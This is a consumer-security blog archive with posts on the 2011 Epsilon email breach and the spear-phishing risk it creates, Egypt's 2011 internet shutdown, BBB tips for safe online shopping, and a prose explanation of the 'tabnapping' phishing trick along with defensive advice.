Archive for the ‘Internet’ Category

Global Spear-Phishing: A New Threat

Thursday, April 7th, 2011

While Charlie Sheen maniacally pronounces his  self induced “winning” status to a saddened, bewildered and exhausted fan base, another  growing menace actually seems poised for “winning”.

Consumers got a wake up call on two fronts with the disclosure of the massive Epsilon Interactive data breach last week.

Our  first wake up call stems from the sheer length of the  list of companies who utilize Epsilon’s email  service to reach their customers.

The second wake up call is the reality that so many trusted brands outsource our names and email addresses to a third party  email service provider (ESP)  who has now been exposed as functionally incapable of protecting the  private personal data that was entrusted to them.

The truth is that there is nothing you or I can do to prevent these leaks when the repository for our data is in the hands of other people.

According to the consumer advocacy group Cauce, the following  financial institutions were affected by the breach:

  • Ameriprise Financial
  • Barclays Bank of Delaware
  • Capital One
  • CITI
  • JP Morgan Chase
  • Moneygram
  • Scottrade
  • TD Ameritrade
  • TIAA-CREF
  • U.S. Bank
  • World Financial Network National Bank (Victoria’s Secret card)

The CAUCE report went on to explain:

“As well, these marketing and retail companies have reportedly had their client email, names and in some cases, other information stolen”:

  1. 1800Flowers.com
  2. AbeBooks (division of Amazon)
  3. Airmiles
  4. Beachbody
  5. Benefit Cosmetics
  6. Best Buy
  7. Best Buy Canada Reward Zone
  8. Brookstone
  9. City Market
  10. CollegeBoard
  11. Dillons
  12. Disney Destinations
  13. Eileen Fisher
  14. Ethan Allen
  15. Food 4 Less
  16. Fred Meyer
  17. Fry’s
  18. Hilton HHonors
  19. Home Shopping Network
  20. Jay C
  21. King Soopers
  22. Krogers
  23. Lacoste
  24. L.L. Bean credit card
  25. Marks and Spencer
  26. Marriott Rewards (Update: Marriottt confirmed NO points totals were taken)
  27. McKinsey Quarterly
  28. New York & Company
  29. QFC
  30. Ralphs
  31. Red Roof Inns
  32. Ritz-Carlton (Update: Ritz-Carlton confirmed NO points totals were taken)
  33. Robert Half
  34. Smith’s
  35. Soccer.com
  36. Target
  37. TiVo
  38. Verizon
  39. Viking River Cruises (unconfirmed)
  40. Walgreens (for the second time)

The impact of the Epsilon breach is expected to cause a sharp, severe and extended series of spear phishing attacks. These phishing attacks will  target and exploit the trusting relationship between the victimized brands and their clients.

It is estimated that tens of millions of people’s names and email addresses have been exposed as a result of this breach. In the past three days, our own household has received at least three notifications from worried banks and retailers.

Consumers should brace themselves for what could be a barrage of incoming phishing attempts, disguised as communication from a trusted vendor. Although most savvy internet users are aware of these ploys, now is a good time for a few timely reminders.

  • Consumers can report attempted phishing attacks to the U.S. Secret Service by emailing them at: phishing-report@uscert.gov
  • Never click on a link in an email, just type the web address into your browser yourself to avoid infectious malware.
  • Security expert Brian Krebs reported that over 100  ESP’s (email service providers) have been under attack by fraudsters in recent months. This is an ongoing, sustained effort to grab your information!
  • Gmail, Earthlink and Yahoo all provide tools to help fight spam and phishing attacks.

An ancient proverb comes to mind: ” Trust in the gods, but tie up  your camel anyway!”

 

Tags: , ,
Posted in Data Breaches, Data security, Financial Scams, Internet, Phishing | No Comments »

How Egypt Pulled The Internet’s Plug

Wednesday, February 2nd, 2011

The Egyptian government has apparently accomplished what many technology experts said could not possibly happen.

Published reports indicate that the “plug” was pulled on Internet access in Egypt on the evening of January 27th, 2011  at about 6PM local time. According to fraud prevention, monitoring  and analytics company  iovation,  Egyptian use of the internet instantly and almost literally fell off a cliff.

As reported in  the blog of  noted security expert Robert Siciliano:

NPR reports “Egypt has apparently done what many technologists thought was unthinkable for any country with a major Internet economy: It unplugged itself entirely from the Internet to try and silence dissent. Experts say it’s unlikely that what’s happened in Egypt could happen in the United States because the U.S. has numerous Internet providers and ways of connecting to the Internet. Coordinating a simultaneous shutdown would be a massive undertaking.”

The Los Angeles Times confirmed that both Facebook and Twitter were affected by the outage, but that after a week of unrest, access to the Internet has been restored by the Egyptian government:

“Facebook said in a statement, “We’re pleased that Internet service has been restored and the 5 million people who use Facebook in Egypt can continue using our service to connect, learn, and share.”

Twitter was quickly awash in messages from Egypt after it was restored. Some of the messages asked for donations and medical supplies at hospitals.”

As I write this post, I asked my teenage daughter if she knew that the internet was shut down in Egypt. Her answer was revealing;  “Yea we learned that in school today Dad.”

Duh. I guess some news travels pretty fast when Big Brother steps aside.

Tags: , ,
Posted in Internet | 1 Comment »

Tis’ The Season For Ruthless Online Fraud

Tuesday, December 7th, 2010

The most troubling aspect about the newest WikiLeaks breach is the grim realization that our nation’s most sensitive information can be so vulnerable, easily accessed and leaked to the world.

You can’t help but wonder, if the U.S. Defense Department can be hacked and attacked from the inside-out,  just how safe is the personal data belonging to the average U.S. citizen?

Here are 10 tips from the Better Business Bureau to help keep you safe online not just during the holidays, but all year long.

The BBB offers this advice:

1. Protect your computer – A computer should always have the most recent updates installed for spam filters, anti-virus and anti-spyware software and a secure firewall.

2. Shop on trustworthy websites – Shoppers should start with BBB to check on the seller’s reputation and record for customer satisfaction. Always look for the BBB seal and other widely-recognized “trustmarks” on retailer websites and click on the seals to confirm that they are valid.

3. Protect your personal information – BBB recommends taking the time to read the site’s privacy policy and understand what personal information is being requested and how it will be used. If there isn’t one posted, it should be taken as a red flag that personal information may be sold to others without permission.

4. Beware of deals that sound too good to be true – Offers on websites and in unsolicited e-mails can often sound too good to be true, especially extremely low prices on hard-to-get items. Consumers should always go with their instincts and not be afraid to pass up a “deal” that might cost them dearly in the end.

5. Beware of phishing – Legitimate businesses do not send e-mails claiming problems with an order or an account to lure the “buyer” into revealing financial information. If a consumer receives such an e-mail, BBB recommends picking up the phone and calling the contact number on the website where the purchase was made to confirm that there really is a problem with the transaction.

6. Confirm your online purchase is secure – Shoppers should always look in the address box for the “s” in https:// and in the lower-right corner for the “lock” symbol before paying. If there are any doubts about a site, BBB recommends right-clicking anywhere on the page and select “Properties.” This will let you see the real URL (website address) and the dialog box will reveal if the site is not encrypted.

7. Pay with a credit card – It’s best to use a credit card, because under federal law, the shopper can dispute the charges if he or she doesn’t receive the item. Shoppers also have dispute rights if there are unauthorized charges on their credit card, and many card issuers have “zero liability” policies under which the card holder pays nothing if someone steals the credit card number and uses it. Never wire money and only shop locally on sites like Craigslist.

8. Keep documentation of your order – After completing the online order process, there may be a final confirmation page or the shopper might receive confirmation by e-mail – BBB recommends saving a copy of the Web page and any e-mails for future reference and as a record of the purchase.

9. Check your credit card statements often – Don’t wait for paper statements; BBB recommends consumers check their credit card statements for suspicious activity by either calling credit card companies or by checking statements online regularly.

10. Know your rights – Federal law requires that orders made by mail, phone or online be shipped by the date promised or, if no delivery time was stated, within 30 days. If the goods aren’t shipped on time, the shopper can cancel and demand a refund. There is no general three-day cancellation right, but consumers do have the right to reject merchandise if it’s defective or was misrepresented. Otherwise, it’s the company’s policies that determine if the shopper can cancel the purchase and receive a refund or credit.

From our family at Penn and Associates to yours,  enjoy this Christmas holiday season. Expect bigger things from this blog in 2011 !

Tags: , , ,
Posted in Computer safety, Cyberwar, Federal Government, Financial Security, Internet | No Comments »

The New Face of Phishing

Tuesday, August 17th, 2010

In the past six months,  a dangerous new threat has emerged in the world of internet phishing. Many of us have often laughed at the crude and poorly crafted phishing explorations that often invade our in-box.

Lest any of us fall asleep at the wheel thinking we are already hip to the rather primitive  phishing tactics of the past, this one could easily  catch you in it’s insidious hooks if you don’t read on.

Known as “tabnapping”, this ploy is designed to psych you out with a behind-the-back switcheroo that literally kidnaps  open tabs and catches most savvy observers by surprise. Using an almost invisible layer of embedded JavaScript, here’s how it works.

Brian Krebs explains:

” As Mozilla Firefox creative lead Aza Raskin describes it, the attack is as elegant as it is simple: A user has multiple tabs open, and surfs to a site that uses special javacript code to silently alter the contents of a tabbed page along with the information displayed on the tab itself, so that when the user switches back to that tab it appears to be the login page for a site the user normally visits.”

In as little as five seconds, a tabbed page silently and almost invisibly changes to a seemingly familiar page (including the cute little “favicon” in the address bar) which requires you to re-enter your log-in credentials. As soon as you enter your private details,  both you and your personal information  have literally been “had”.

The best defense against this tricky new tactic is to take a time-out. What that means is whenever a site you visit “times-out” , you should take some time-out of your browsing frenzy to open a new tab and re-enter the desired URL yourself.

Most browsers including Safari, Chrome,  Firefox and Internet Explorer claim to be on the lookout for you by blocking tabnapping attack code. Researchers and hackers have both been able to sidestep many of the current blocking protections,  leaving most browsers vulnerable.

Safety dictates that you don’t log in on any tab that you  have not opened yourself. Get into the habit of opening fresh tabs whenever you enter a user-name or password.

If you forget to refresh previously opened and familiar log in pages, one day soon you could literally open up a fresh can of worms.

Posted in Data security, Financial Scams, Internet, Phishing | 2 Comments »